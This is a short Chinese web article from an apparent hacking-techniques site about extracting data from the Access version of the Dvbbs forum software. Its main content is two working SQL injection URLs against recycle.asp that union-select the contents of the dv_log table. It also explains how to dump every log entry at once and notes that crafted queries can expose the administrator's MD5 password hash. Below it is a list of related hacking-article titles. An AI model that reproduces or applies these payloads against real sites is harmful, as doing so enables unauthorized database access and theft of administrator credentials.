动网access版暴log库终极

所属分类: 实用技巧 / 漏洞研究 阅读数: 1881
收藏 0 赞 0 分享

注:需要获得前台管理员权限后使用 

文章中指定recycle.asp?tablename=Dv_bbs1%20union%20select%201,1,l_content,1,1,1%20from%20dv_log%20where%20l_id=5%20union%20select%201,1,1,1,1,1%20from%20dv_bbs1&page=2000(回收站的最后页的id),指变换l_id=‘’的值来暴出l_concent的值一次只能暴一个内容,看了下动网的数据库表,只要指定l_announceid=0就可以全部暴出,语句这样构造recycle.asp?tablename=Dv_bbs1%20union%20select%201,1,l_content,1,1,1%20from%20dv_log%20where%20l_announceid=0%20union%20select%201,1,1,1,1,1%20from%20dv_bbs1&page=2000嘿嘿,是不是全部暴出来了,构造适当的语句可以暴出管理员的后台md5值等等内容。另注:暴出数据字段的内容是回收站帖子的最后页! 

更多精彩内容其他人还在看

悬念音乐程序安装程序写马(图)

悬念音乐程序安装程序写马(图)
收藏 0 赞 0 分享

为什么经常被网络入侵?探究原因

为什么经常被网络入侵?探究原因
收藏 0 赞 0 分享

黑客之门的魅力:感染与加载(图)

黑客之门的魅力:感染与加载(图)
收藏 0 赞 0 分享

诱人视频请君入瓮 解析RealPlayer溢出漏洞

诱人视频请君入瓮 解析RealPlayer溢出漏洞
收藏 0 赞 0 分享

漏洞漫舞的飞骋

漏洞漫舞的飞骋
收藏 0 赞 0 分享

穷追猛打:破译Foxmail“密码天书”

穷追猛打:破译Foxmail“密码天书”
收藏 0 赞 0 分享

BBSXP漏洞再探究

BBSXP漏洞再探究
收藏 0 赞 0 分享

安全技术—RSA公钥密码体制安全性分析

安全技术—RSA公钥密码体制安全性分析
收藏 0 赞 0 分享

蜜罐技术:消除防火墙局限和脆弱

蜜罐技术:消除防火墙局限和脆弱
收藏 0 赞 0 分享

跨站脚本说明

跨站脚本说明
收藏 0 赞 0 分享
查看更多